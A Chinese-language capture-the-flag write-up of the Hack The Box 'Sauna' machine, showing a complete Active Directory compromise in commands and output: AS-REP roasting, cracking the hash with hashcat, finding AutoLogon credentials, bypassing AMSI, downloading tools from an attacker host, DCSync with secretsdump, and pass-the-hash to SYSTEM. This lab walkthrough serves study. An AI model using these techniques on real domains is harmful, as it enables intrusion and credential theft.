title: Hack The Box - Sauna(DCSync滥用) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
Change begins with persistence and commitment. 改变始于坚持和付出。
Hack The Box - Sauna
# Nmap 7.92 scan initiated Thu Apr 22 11:05:48 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-21 21:15:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-21T21:16:49
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 22 11:17:29 2022 -- 1 IP address (1 host up) scanned in 701.17 seconds53端口:
DNS协议可以枚举目标域,但是Nmap已经为我扫了出来,目标还开放有80端口,而且我没有定制字典,这种拼运气的情况我个人很抵触,不过我可以试试它能否区域传送:
$ dig axfr @10.10.10.175 sauna.htb
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.175 sauna.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.$ dig axfr @10.10.10.175 egotistical-bank.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.175 egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.不出意外的都不行。
80端口:
http协议,按HTB惯例来讲该靶机名称为Sauna,应该有个sauna.htb的域名,
它看起来像是个银行门面,能够让我向服务器发起请求的按钮有很多很多,可惜都是假的,它仅仅在各个html网页之间来回跳转,尽管我可以拦截数据包去尝试更改请求的文件,但是我觉得目录爆破会更直接一点。
它确实是有一些输入框,甚至我还能看到它们的请求方式也能抓到数据包。
但是不管我提交任何东西,服务器都会报错。不过我找到了它们的团队信息:
我会记住这里,如果后续我需要枚举爆破的话,或许能为我提供一些参考信息。好吧,那么我就需要进行目录爆破了,
[11:43:44] 403 - 312B - /%2e%2e//google.com
[11:44:53] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:44:59] 200 - 30KB - /about.html
[11:45:57] 200 - 15KB - /contact.html
[11:45:59] 301 - 144B - /css -> http://sauna.htb/css/
[11:46:19] 301 - 146B - /fonts -> http://sauna.htb/fonts/
[11:46:28] 403 - 1KB - /images/
[11:46:28] 301 - 147B - /images -> http://sauna.htb/images/
[11:46:30] 200 - 32KB - /index.html 没什么东西,或许我可以试试爆破IP,或许他会有一些内网资产暴漏在外网中,可一样的我并没有爆破出什么信息。
RPC:
88端口是kerberos协议,因为我目前除了掌握那几个人名之外,并没有其他信息,我准备稍放放,或许我可以在其他地方获取更多的用户信息。我可以尝试RPC:
rpcclient -U "" 10.10.10.175 -N
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDRPC拒绝了我。
LADP:
尴尬,Ladpsearch我不会用,找的教程照着敲一直说我用法错误,这个我先放过了。
$ ldapsearch -x -h 10.10.10.175 -s base namingcontexts
ldapsearch: unrecognized option -
usage: ldapsearch [options] [filter [attributes...]]
where:
filter RFC 4515 compliant LDAP search filter
attributes whitespace-separated list of attribute descriptions
which may include:
1.1 no attributes
* all user attributes
+ all operational attributes
Search options:
-a deref one of never (default), always, search, or find
SMB:
smb可以匿名访问,但是什么都没有:
$ smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableKerberos:
好吧,其他端口开放的http服务都无法正常访问。LADP我还不会用,找了点教程都有点过时了,不适用于我当下。我不得不把目光放回了kerberos,目前我掌握的信息似乎只有80端口他们团队的人名能够派上用场,我可以试着去做一份字典。
做字典的话要酌情目标的环境习惯,像外国命名普遍名与姓都是大写,但是系统登录用户的命名规则一般都是全小写或是名字的缩写,这要考虑进去,如果有目标命名规则相关情报的话更容易枚举一些,不过我没有,还可以适当的添加一些常用的用户名进去,我的字典就长这个样子:
administrator
Administrator
Fergus Smith
fergus smith
FergusSmith
fergussmith
shaun coins
shauncoins
Shaun Coins
ShaunCoins
Hugo Bear
HugoBear
hugo bear
hugobear
Bowie Taylor
BowieTaylor
bowie taylor
bowietaylor
Sophie Driver
SophieDriver
sophie driver
sophiedriver
Steven Kerb
StevenKerb
steven kerb
stevenkerb
admin
Admin当然这是肯定不够的,Github会有一些简单的python脚本,用于随机组合生成更多可能存在的用户名。
https://github.com/krlsio/python/blob/main/namemash.py这样我就可以得到一个包含更多可能存在用户名的新字典:
$ sudo python3 namemash.py user.txt
administratoradministrator
administratoradministrator
administrator.administrator
administrator.administrator
administratora
aadministrator
aadministrator
a.administrator
a.administrator
administrator
administrator
administratoradministrator
administratoradministrator
administrator.administrator
administrator.administrator
administratora
aadministrator
aadministrator
a.administrator
a.administrator
administrator
administrator
fergussmith
smithfergus
fergus.smith
smith.fergus
smithf
fsmith
sfergus
f.smith
s.fergus
fergus
smith
fergussmith
smithfergus
fergus.smith
smith.fergus
smithf
fsmith
sfergus
f.smith
s.fergus
fergus
smith
fergussmithfergussmith
fergussmithfergussmith
fergussmith.fergussmith
fergussmith.fergussmith
fergussmithf
ffergussmith
ffergussmith
f.fergussmith
f.fergussmith
fergussmith
fergussmith
fergussmithfergussmith
fergussmithfergussmith
fergussmith.fergussmith
fergussmith.fergussmith
fergussmithf
ffergussmith
ffergussmith
f.fergussmith
f.fergussmith
fergussmith
fergussmith
shauncoins
coinsshaun
shaun.coins
coins.shaun
coinss
scoins
cshaun
s.coins
c.shaun
shaun
coins
shauncoinsshauncoins
shauncoinsshauncoins
shauncoins.shauncoins
shauncoins.shauncoins
shauncoinss
sshauncoins
sshauncoins
s.shauncoins
s.shauncoins
shauncoins
shauncoins
shauncoins
coinsshaun
shaun.coins
coins.shaun
coinss
scoins
cshaun
s.coins
c.shaun
shaun
coins
shauncoinsshauncoins
shauncoinsshauncoins
shauncoins.shauncoins
shauncoins.shauncoins
shauncoinss
sshauncoins
sshauncoins
s.shauncoins
s.shauncoins
shauncoins
shauncoins
hugobear
bearhugo
hugo.bear
bear.hugo
bearh
hbear
bhugo
h.bear
b.hugo
hugo
bear
hugobearhugobear
hugobearhugobear
hugobear.hugobear
hugobear.hugobear
hugobearh
hhugobear
hhugobear
h.hugobear
h.hugobear
hugobear
hugobear
hugobear
bearhugo
hugo.bear
bear.hugo
bearh
hbear
bhugo
h.bear
b.hugo
hugo
bear
hugobearhugobear
hugobearhugobear
hugobear.hugobear
hugobear.hugobear
hugobearh
hhugobear
hhugobear
h.hugobear
h.hugobear
hugobear
hugobear
bowietaylor
taylorbowie
bowie.taylor
taylor.bowie
taylorb
btaylor
tbowie
b.taylor
t.bowie
bowie
taylor
bowietaylorbowietaylor
bowietaylorbowietaylor
bowietaylor.bowietaylor
bowietaylor.bowietaylor
bowietaylorb
bbowietaylor
bbowietaylor
b.bowietaylor
b.bowietaylor
bowietaylor
bowietaylor
bowietaylor
taylorbowie
bowie.taylor
taylor.bowie
taylorb
btaylor
tbowie
b.taylor
t.bowie
bowie
taylor
bowietaylorbowietaylor
bowietaylorbowietaylor
bowietaylor.bowietaylor
bowietaylor.bowietaylor
bowietaylorb
bbowietaylor
bbowietaylor
b.bowietaylor
b.bowietaylor
bowietaylor
bowietaylor
sophiedriver
driversophie
sophie.driver
driver.sophie
drivers
sdriver
dsophie
s.driver
d.sophie
sophie
driver
sophiedriversophiedriver
sophiedriversophiedriver
sophiedriver.sophiedriver
sophiedriver.sophiedriver
sophiedrivers
ssophiedriver
ssophiedriver
s.sophiedriver
s.sophiedriver
sophiedriver
sophiedriver
sophiedriver
driversophie
sophie.driver
driver.sophie
drivers
sdriver
dsophie
s.driver
d.sophie
sophie
driver
sophiedriversophiedriver
sophiedriversophiedriver
sophiedriver.sophiedriver
sophiedriver.sophiedriver
sophiedrivers
ssophiedriver
ssophiedriver
s.sophiedriver
s.sophiedriver
sophiedriver
sophiedriver
stevenkerb
kerbsteven
steven.kerb
kerb.steven
kerbs
skerb
ksteven
s.kerb
k.steven
steven
kerb
stevenkerbstevenkerb
stevenkerbstevenkerb
stevenkerb.stevenkerb
stevenkerb.stevenkerb
stevenkerbs
sstevenkerb
sstevenkerb
s.stevenkerb
s.stevenkerb
stevenkerb
stevenkerb
stevenkerb
kerbsteven
steven.kerb
kerb.steven
kerbs
skerb
ksteven
s.kerb
k.steven
steven
kerb
stevenkerbstevenkerb
stevenkerbstevenkerb
stevenkerb.stevenkerb
stevenkerb.stevenkerb
stevenkerbs
sstevenkerb
sstevenkerb
s.stevenkerb
s.stevenkerb
stevenkerb
stevenkerb
adminadmin
adminadmin
admin.admin
admin.admin
admina
aadmin
aadmin
a.admin
a.admin
admin
admin
adminadmin
adminadmin
admin.admin
admin.admin
admina
aadmin
aadmin
a.admin
a.admin
admin
admin然后我可以通过Kerbrute枚举目标账户:
$ sudo ./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL ./user.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 12:57:37 > Using KDC(s):
2022/04/22 12:57:37 > 10.10.10.175:88
2022/04/22 12:57:37 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:37 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:46 > Done! Tested 309 usernames (6 valid) in 9.346 seconds我枚举到了fsmith账户:
或许我猜到了他们账户的命名规则,我可以再枚举一次:
scois
hbear
btaylor
sdriver
skerb好吧,目标只肯告诉我fsmith:
$ sudo ./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL ./user.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 13:02:40 > Using KDC(s):
2022/04/22 13:02:40 > 10.10.10.175:88
2022/04/22 13:02:41 > Done! Tested 5 usernames (0 valid) in 0.340 seconds那么我可以再进一步的提取信息:
administrator
fsmith再通过impacket-0.9.24/examples/GetNPUsers.py去尝试获取这些用户的hash:
$ ./posttool/impacket-0.9.24/examples/GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile ./user.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$ cat hashes.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:52460b6eb0d8bb3dfa86e34923b80370$90e9ec7bba9864654e8a6eb6be31addfeca4f455882095750eaaaa1f6b5f2813afb922ff5612310dbb24963b726a40388a0e460180ecf3f8fd7dff6b7fd21f537706efd4b4d3a5a88a2676b3b653222571509e2301ecbcd0a72d328087c0abfeb935b3481d6d85043f7dcb6088e21b47e0edbdf4e5d4fa3c4258ce2bf79a84a5bcd8ee3499b7eeba413c76d793553c4ae899de845aca46205610166abf255465746eff3048c703afa11428213c0e8732df752eac416646aaa8326b8876426eb22cbc3ea0bdfc2d616fb81b2c0db620739aff2aba542804ec33d9bff4efec61c0b3bb884d9887a528e9bbe31363c03dce58c9953316294c4cee3beb6c0b05c8b9我可以使用hashcat帮我对其进行暴力破解:
$ hashcat -m 18200 ./hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
......
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:52460b6eb0d8bb3dfa86e34923b80370$90e9ec7bba9864654e8a6eb6be31addfeca4f455882095750eaaaa1f6b5f2813afb922ff5612310dbb24963b726a40388a0e460180ecf3f8fd7dff6b7fd21f537706efd4b4d3a5a88a2676b3b653222571509e2301ecbcd0a72d328087c0abfeb935b3481d6d85043f7dcb6088e21b47e0edbdf4e5d4fa3c4258ce2bf79a84a5bcd8ee3499b7eeba413c76d793553c4ae899de845aca46205610166abf255465746eff3048c703afa11428213c0e8732df752eac416646aaa8326b8876426eb22cbc3ea0bdfc2d616fb81b2c0db620739aff2aba542804ec33d9bff4efec61c0b3bb884d9887a528e9bbe31363c03dce58c9953316294c4cee3beb6c0b05c8b9:Thestrokes23
.....
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 60%
Started: Fri Apr 22 13:10:32 2022
Stopped: Fri Apr 22 13:11:28 2022 以fsmith身份获取shell,并获取user.txt:
我获取到了fsmith账户的口令,我可以尝试去登录目标:
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> 我进来了,并在它的desktop中找到了user.txt:
*Evil-WinRM* PS C:\Users\FSmith> cd desktop
*Evil-WinRM* PS C:\Users\FSmith\desktop> ls
Directory: C:\Users\FSmith\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/22/2022 4:28 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt我可以看一眼当前用户的权限信息:
*Evil-WinRM* PS C:\Users\FSmith\desktop> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.fsmith用户三项权限信息对于我来说没什么用处。
或许我可以尝试枚举一些系统漏洞,如果我能获取到目标系统权限的话,那域不域的无所谓了呀,我可以为其传送WinPEAS.exe,让它帮我枚举可供我提权的信息。
*Evil-WinRM* PS C:\Users\FSmith\desktop> wget http://10.10.16.7/WinPEASx86.exe -O WinPEAS.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\FSmith\desktop> ./WinPEAS.exe cmd fast > sauna_winpeas_fast在目标注册表中有这么一条信息:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround! 看起来我又拿到一个账户,虽然是WinPEAS枚举出来的,但是我也可以人为的看一眼:
*Evil-WinRM* PS C:\Users\FSmith\desktop> reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x156458a35
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!我可以尝试去登录该用户:
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1但是我登录失败了。我细看了一下:
*Evil-WinRM* PS C:\Users\FSmith\desktop> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.根本就没有svc_loanmanager这个用户,但是有一个跟他长的特别像,我可以试试:
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 以svc_loanmgr身份获取shell:
但是他也没有什么权限啊,跟fsmith是一样的:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.我又尝试以svc_loanmgr身份运行WinPEAS枚举一些提权信息,没什么新东西。我准备使用SharpHound我帮进行探测:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> wget http://10.10.16.7/SharpHound.exe -O SharpHound.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2022 6:38 AM 906752 SharpHound.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./SharpHound.exe我会启动smb共享将bloodhound.zip传送回我的机器:
$ ./smbserver.py share . -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> cp 20220422063933_BloodHound.zip \\10.10.16.7\share
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 但bloodhound似乎出了问题,或是目标环境出了问题,SharpHound返回的user.file文件数据是空的,无论我以svc_loanmgr用户或是fsmith都一样,导致我在bloodhound看到的节点图可能是错误的。
不过没事,我还可以用PowerView,PowerView有时会被AMSI当成恶意软件脚本,Evil-WinRM提供了相应的模块可以禁用(为什么该工具会如此霸道,Evil英译中 还是 "邪"),当然它也不止禁用AMSI,还有其他功能:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> wget http://10.10.16.7/PowerView.ps1 -O PowerVi
ew.ps1 -UseBasicParsing
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\PowerView.ps1加载PowerView后,我可以通过invoke-AclScanner检查域中对象的有趣权限,也有很多,我只列关键的:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> invoke-aclscanner
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2966785786-3096785034-1186376766-1108
IdentityReferenceName : svc_loanmgr
IdentityReferenceDomain : EGOTISTICAL-BANK.LOCAL
IdentityReferenceDN : CN=L Manager,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
IdentityReferenceClass : user主要是这三条信息:
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL //目标域
ActiveDirectoryRights : ExtendedRight //ActiveDirectory的扩充权限
IdentityReferenceName : svc_loanmgr //正是我当前用户我当前用户对目标该域有扩充的权限,这个权限属性还是挺重要的,它可以允许我对目标发起DCSync攻击从而获取目标保存的域内账户的hash,我可以利用impacket/examples目录下的secretsdump.py发起DCSync攻击。
能获取到的hash也有很多,所以我只列了关键部分,比如管理员账户的:
$ ./secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
......
[*] Cleaning up... 以Administrator身份shell:
我就可以PTH移动到目标机器:
$ ./psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file xamIegER.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service UzYN on 10.10.10.175.....
[*] Starting service UzYN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> 我可以读取root.txt:
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM .
07/14/2021 03:35 PM ..
04/22/2022 04:28 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,829,065,728 bytes free
C:\Users\Administrator\Desktop> type root.txt 看起来Active Directory中各式各样的用户,组,权限信息,如果无法眼熟到可以灵活的英译中,就会成为Active Directory学习之路中的一大绊脚石。